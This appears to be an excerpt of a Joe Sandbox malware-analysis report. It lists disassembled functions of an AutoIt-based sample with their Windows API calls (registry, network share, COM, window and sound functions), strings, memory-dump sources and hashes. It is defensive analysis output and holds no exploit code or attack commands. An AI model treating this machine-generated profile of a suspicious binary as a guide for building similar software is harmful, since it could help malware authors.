                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                    • API String ID: 537147316-1018226102
                                                                                                                    • Opcode ID: 9ed8aea43191ab7f4eaee6f8720f3b60bcf1d7a463793d9a6d919ff95694c460
                                                                                                                    • Instruction ID: 0a29994f41960aea3a5d584020f8f3e88a170371a91e42c420f799c1b80dfb99
                                                                                                                    • Opcode Fuzzy Hash: 9ed8aea43191ab7f4eaee6f8720f3b60bcf1d7a463793d9a6d919ff95694c460
                                                                                                                    • Instruction Fuzzy Hash: 2202BE301283419FCB25EF20C891AEFBBE5AF98394F54491DF489972A1DB30D969CF42
                                                                                                                    Function 00312D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00312D50
                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00312DDD
                                                                                                                    • GetMenuItemCount.USER32(00375890), ref: 00312E66
                                                                                                                    • DeleteMenu.USER32(00375890,00000005,00000000,000000F5,?,?), ref: 00312EF6
                                                                                                                    • DeleteMenu.USER32(00375890,00000004,00000000), ref: 00312EFE
                                                                                                                    • DeleteMenu.USER32(00375890,00000006,00000000), ref: 00312F06
                                                                                                                    • DeleteMenu.USER32(00375890,00000003,00000000), ref: 00312F0E
                                                                                                                    • GetMenuItemCount.USER32(00375890), ref: 00312F16
                                                                                                                    • SetMenuItemInfoW.USER32(00375890,00000004,00000000,00000030), ref: 00312F4C
                                                                                                                    • GetCursorPos.USER32(?), ref: 00312F56
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00312F5F
                                                                                                                    • TrackPopupMenuEx.USER32(00375890,00000000,?,00000000,00000000,00000000), ref: 00312F72
                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00312F7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3993528054-0
                                                                                                                    • Opcode ID: 94261ebbb002243d8ad08c9b78e2ef3d0777616a4a171c6f086bcce40978a371
                                                                                                                    • Instruction ID: 33d6fbf4583821723f445ad7599712a103199855f9004a27a319894815c32136
                                                                                                                    • Opcode Fuzzy Hash: 94261ebbb002243d8ad08c9b78e2ef3d0777616a4a171c6f086bcce40978a371
                                                                                                                    • Instruction Fuzzy Hash: 7871B270640205BEEB2A9F54DC85FEBBF68FF09754F100216F625AA1E1C7B158B0DBA4
                                                                                                                    Function 003288AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 003288D7
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00328904
                                                                                                                    • CoUninitialize.OLE32 ref: 0032890E
                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00328A0E
                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00328B3B
                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00342C0C), ref: 00328B6F
                                                                                                                    • CoGetObject.OLE32(?,00000000,00342C0C,?), ref: 00328B92
                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00328BA5
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00328C25
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00328C35
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                    • String ID: ,,4
                                                                                                                    • API String ID: 2395222682-3600021901
                                                                                                                    • Opcode ID: a50f1d511d243d59140c95b134d68331f47bc56fed69ec3e89a763f676f48180
                                                                                                                    • Instruction ID: a32f086abc5696d52eefabeefedc6b5fbcc95c5b1cb56219d402d68760ed82be
                                                                                                                    • Opcode Fuzzy Hash: a50f1d511d243d59140c95b134d68331f47bc56fed69ec3e89a763f676f48180
                                                                                                                    • Instruction Fuzzy Hash: 2AC156B1608315AFC701DF68D88496BB7E9FF89348F00492DF98A9B261DB71ED05CB52
                                                                                                                    Function 003077DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    • _memset.LIBCMT ref: 0030786B
                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003078A0
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003078BC
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003078D8
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00307902
                                                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0030792A
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00307935
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0030793A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                    • API String ID: 1411258926-22481851
                                                                                                                    • Opcode ID: 7204bf3ddd634f2f5f01a1f828af662f05e75b1001d8d5fc1335a6b274585a59
                                                                                                                    • Instruction ID: 62ae5003f095c7e76eedf8ee4f689fc5f27371f69f7798a8c564a7f6fcd133cc
                                                                                                                    • Opcode Fuzzy Hash: 7204bf3ddd634f2f5f01a1f828af662f05e75b1001d8d5fc1335a6b274585a59
                                                                                                                    • Instruction Fuzzy Hash: DF411872C24229ABCF16EBA4DC95DEDB778BF44350F444029E915A71A1DB30AD14CF90
                                                                                                                    Function 00330E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0032FDAD,?,?), ref: 00330E31
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                    • API String ID: 3964851224-909552448
                                                                                                                    • Opcode ID: a344ae604c684470aa547f707e7da2ad8bda6a39cd3c5d603438248d2fbb375e
                                                                                                                    • Instruction ID: 468ec478cd3048f6b05029f8e29aac7f5ed1798dab3cc86531262dc8c1ab931e
                                                                                                                    • Opcode Fuzzy Hash: a344ae604c684470aa547f707e7da2ad8bda6a39cd3c5d603438248d2fbb375e
                                                                                                                    • Instruction Fuzzy Hash: 6F417E3522024A8BCF16EF10D8E5BEF3768BF51344F154456FD951B2A6DB309D2ACBA0
                                                                                                                    Function 0030F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002EE2A0,00000010,?,Bad directive syntax error,0033F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0030F7C2
                                                                                                                    • LoadStringW.USER32(00000000,?,002EE2A0,00000010), ref: 0030F7C9
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    • _wprintf.LIBCMT ref: 0030F7FC
                                                                                                                    • __swprintf.LIBCMT ref: 0030F81E
                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0030F88D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                    • API String ID: 1506413516-4153970271
                                                                                                                    • Opcode ID: 5668af4853d01caaf1d94231c5625e3e45ae3c7a630aa3e9212782c3929a62c1
                                                                                                                    • Instruction ID: 23f694264509e77e8eaed9fc3e1eb1302f94892b7017fee59726736bd16286a6
                                                                                                                    • Opcode Fuzzy Hash: 5668af4853d01caaf1d94231c5625e3e45ae3c7a630aa3e9212782c3929a62c1
                                                                                                                    • Instruction Fuzzy Hash: DE214F3195021AAFCF12EF90CC5AEED7779BF18300F044466F515661A2DA719A28DF51
                                                                                                                    Function 003152C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                      • Part of subcall function 002B7924: _memmove.LIBCMT ref: 002B79AD
                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00315330
                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00315346
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00315357
                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00315369
                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0031537A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$_memmove
                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                    • API String ID: 2279737902-1007645807
                                                                                                                    • Opcode ID: 3f69475ecd1f6cc04d22d9271b08f071bce8689b95525b9224c0488dd4d35550
                                                                                                                    • Instruction ID: c34cc5947e98bd7f0daf0eb38a58661e945ff558f060dd47c4dd4adec1cfed5e
                                                                                                                    • Opcode Fuzzy Hash: 3f69475ecd1f6cc04d22d9271b08f071bce8689b95525b9224c0488dd4d35550
                                                                                                                    • Instruction Fuzzy Hash: AF11B220A6012979D725B761CC4AEFF7B7CEBD9B80F000929B411A20D5DEA00D55C9A0
                                                                                                                    Function 003146B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                    • String ID: 0.0.0.0
                                                                                                                    • API String ID: 208665112-3771769585
                                                                                                                    • Opcode ID: 11aff9e2c770ad469f67fd374f9858be5ead48c1f9c0d078cee320cd65c4b034
                                                                                                                    • Instruction ID: 39e3e2251c313877845ab9871d91d229a04e57f24b06e61bc3c2d7331055cd55
                                                                                                                    • Opcode Fuzzy Hash: 11aff9e2c770ad469f67fd374f9858be5ead48c1f9c0d078cee320cd65c4b034
                                                                                                                    • Instruction Fuzzy Hash: 1411D231900114AFCB2ABB70DC8AEEA77BCEB1A711F4441B6F455961A1EF708EC18A60
                                                                                                                    Function 00314F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • timeGetTime.WINMM ref: 00314F7A
                                                                                                                      • Part of subcall function 002D049F: timeGetTime.WINMM(?,75A8B400,002C0E7B), ref: 002D04A3
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00314FA6
                                                                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00314FCA
                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00314FEC
                                                                                                                    • SetActiveWindow.USER32 ref: 0031500B
                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00315019
                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00315038
                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00315043
                                                                                                                    • IsWindow.USER32 ref: 0031504F
                                                                                                                    • EndDialog.USER32(00000000), ref: 00315060
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                    • String ID: BUTTON
                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                    • Opcode ID: 850fc269bbe058077f395c2098f43f76766a0d926f286c3bfd031c5769132941
                                                                                                                    • Instruction ID: 3755e8d80b9b63c959a070df89cd20f72376eb05e03d8dc9dadcd21e0b442dbc
                                                                                                                    • Opcode Fuzzy Hash: 850fc269bbe058077f395c2098f43f76766a0d926f286c3bfd031c5769132941
                                                                                                                    • Instruction Fuzzy Hash: E921C670A00A04EFE72B5F60EDCAF663B6DEB4E755F441028F109812B1EB718DD49A61
                                                                                                                    Function 0031D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0031D5EA
                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0031D67D
                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 0031D691
                                                                                                                    • CoCreateInstance.OLE32(00342D7C,00000000,00000001,00368C1C,?), ref: 0031D6DD
                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0031D74C
                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 0031D7A4
                                                                                                                    • _memset.LIBCMT ref: 0031D7E1
                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0031D81D
                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0031D840
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0031D847
                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0031D87E
                                                                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 0031D880
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1246142700-0
                                                                                                                    • Opcode ID: f88e4b8b435c23c81687af63f9d0fbfdbb1a8ca181e96196259e975cd9e7806e
                                                                                                                    • Instruction ID: e88bf825a0a73121aa70b9be7d7af1f348f24c4d0f8f87072b4dd40c9bb12bd2
                                                                                                                    • Opcode Fuzzy Hash: f88e4b8b435c23c81687af63f9d0fbfdbb1a8ca181e96196259e975cd9e7806e
                                                                                                                    • Instruction Fuzzy Hash: E8B1E975A00109AFDB05DFA4C885DAEBBB9EF49314F148469F909EB261DB30ED81CF50
                                                                                                                    Function 0030C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0030C283
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0030C295
                                                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0030C2F3
                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0030C2FE
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0030C310
                                                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0030C364
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0030C372
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0030C383
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0030C3C6
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0030C3D4
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0030C3F1
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0030C3FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3096461208-0
                                                                                                                    • Opcode ID: 6ba7263ec1b5e05a899a7cb90cdcde9fcfc404ee39274f2161897450b68def73
                                                                                                                    • Instruction ID: 50efa25f494aa2e56bd5b6f87639344b32a47e79fa1af934457103996d545ebf
                                                                                                                    • Opcode Fuzzy Hash: 6ba7263ec1b5e05a899a7cb90cdcde9fcfc404ee39274f2161897450b68def73
                                                                                                                    • Instruction Fuzzy Hash: BF515F71B10205AFDB19CFA9DD9AAAEBBBAEB88310F54822DF515D72D0D7749D008B10
                                                                                                                    Function 002B201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002B2036,?,00000000,?,?,?,?,002B16CB,00000000,?), ref: 002B1B9A
                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002B20D3
                                                                                                                    • KillTimer.USER32(-00000001,?,?,?,?,002B16CB,00000000,?,?,002B1AE2,?,?), ref: 002B216E
                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 002EBCA6
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002B16CB,00000000,?,?,002B1AE2,?,?), ref: 002EBCD7
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002B16CB,00000000,?,?,002B1AE2,?,?), ref: 002EBCEE
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002B16CB,00000000,?,?,002B1AE2,?,?), ref: 002EBD0A
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002EBD1C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 641708696-0
                                                                                                                    • Opcode ID: 63cdc2c95e44a29a069e8cbe7fa7bb1e9eb7b4df545ebebac091805811f966cb
                                                                                                                    • Instruction ID: 6a1976610e5a3d72893b4a4d51ec067dc5e00fcad1f083d71c9dedbf73dae6bb
                                                                                                                    • Opcode Fuzzy Hash: 63cdc2c95e44a29a069e8cbe7fa7bb1e9eb7b4df545ebebac091805811f966cb
